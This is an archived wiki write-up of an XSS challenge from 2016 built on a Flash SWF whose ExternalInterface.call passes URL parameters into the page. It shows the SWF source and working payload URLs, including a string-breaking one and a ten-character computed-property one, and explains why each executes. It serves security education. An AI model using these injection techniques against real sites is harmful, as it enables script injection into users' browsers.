Skip to content
This repository has been archived by the owner on Jul 4, 2023. It is now read-only.

H5SC Mini Challenge 4

Quan Yang edited this page Apr 2, 2016 · 18 revisions

H5SC Mini-Challenge 4

This challenge was public only for a few hours on 1st of April 2016. It involved Flash (because why not), ExternalInterface, one obvious - and another less obvious solution.

So, keep reading - it might be not that boring in the end.

Source Code

This is the source code of the challenge SWF:

{
    import flash.display.Sprite;
    import flash.external.ExternalInterface;
    import flash.text.TextField;
    
    public class Main extends Sprite
    {
        public function Main() 
        {
            ExternalInterface.call('console.log', loaderInfo.parameters);
            var text:TextField = new TextField();
            text.height = 200;
            text.width = 600;
            text.text = "Can you XSS me? Execute an alert(1) and win fame and glory :)\r\nSend a mail to mario@cure53.de once you did it.";
            text.text += loaderInfo.parameters.text?loaderInfo.parameters.text:"";
            addChild(text);
        }
    }
}

The obvious solution

There is one solution, that is obvious and known - and it involves breaking the string that contains the value of one of the Flash variables. You can simply do the following to trigger the alert:

https://html5sec.org/minichallenges/4?text=\%22})));alert(1)}catch(e){}//

As many people found out via Flash de-compilation (JPEXS is a great tool for that), there is a Flash variable (flashVar) in use and its name is text. So why not go with that. Flash, as we know, forgets to escape the escaper, we break the string, payload arrives in the try-catch block that ExternalInterface generates and boom. The classic way.

But we can also do this:

https://html5sec.org/minichallenges/4?x=\%22})));alert(1)}catch(e){}//

Huh? We don't need to use the "existing" flashVar, we can use whatever variable name we want. Strange? Can we go even further?

What if the SWF file we attack now starts to escape properly on its own? Maybe someone fixes the XSS for good - by replacing \ with \\ for example, as often seen in the wild?

And how can it be possible to score a valid solution with only ten characters? And not with like more than thirty as seen above?

The not so obvious solution

The bad code in place has obviously nothing to do with any misuse of the flashVar called text, but with this snippet:

ExternalInterface.call('console.log', loaderInfo.parameters);
                                      ^-- could be any object where we can control a *label*

This code basically takes an object as the second argument for ExternalInterface.call, meaning, the first argument for the function that Flash attempts to invoke in the surrounding DOM. This is how it looks, without any attack in place - but just a simple string:

try { __flash__toXML(console.log(("all fine here"))) ; } catch (e) { "<undefined/>"; }`
                                  ^-- nothing is broken

The solutions seen above would have worked independently of the name of the Flash variable, just throwing it into the ExternalInterface.call method would have done the job. It's all the value, the name / label doesn't matter here. The attack breaks the string - new JavaScript code gets injected and done.

try { __flash__toXML(console.log(({text:"\\"})));alert(1)}catch(e){}//"}))}catch(e){}//:""}))) ; } catch (e) { "<undefined/>"; }
                                          ^---- Flash escapes the quote, but not the backslash.

Now let's think about escaping again. What if we cannot break any strings?

Well, we don't really need a property-value-pair to get the job done! This is the shortest solution we received:

https://html5sec.org/minichallenges/4?[alert(1)]

Or even...

https://html5sec.org/minichallenges/4?[alert`1`]

This URL creates an object loaderInfo.parameters that looks like this:

loaderInfo
 > parameters
  > [alert`1`]
   > undefined

Or this, to be more clear:

loaderInfo = {parameters: {[alert`1`]: undefined}}

That means, in the resulting string that ExternalInterface.call generates, the following object is being used:

try { __flash__toXML(console.log(({[alert`1`]:undefined))}catch(e){}//:""}))) ; } catch (e) { "<undefined/>"; }
                                   ^------ no string breakage

This then means, if we can inject into a property name or label, we don't have to break any strings. Nor do we have to use any parenthesis.

We make dual use of ES6 (or ES2015 fwiw) and utilize "Computed Properties" and "Template Strings" and the quirky behavior of ActionScript and ExternalInterface, where labels aren't necessarily strings so no breakage is needed.

Depending on how the stars are aligned, this might score you an XSS bug that would otherwise be unexploitable :)

Solvers

  1. @xrekkusu 10 chars
  2. @tunnelshade_ 10 chars
  3. @petecorey 10 chars
  4. @quanyang 12 chars
  5. @smiegles 13 chars
  6. @pouyadarabi 13 chars
  7. @avlidienbrunn 14 chars
  8. @fransrosen 27 chars
  9. @mriccia 27 chars
  10. @hykatza 26 chars
  11. @llamakko_cafe 26 chars
  12. @fab_tc 31 chars
  13. @en4rab 32 chars
  14. M. B. Rad 33 chars
  15. @simps0n 34 chars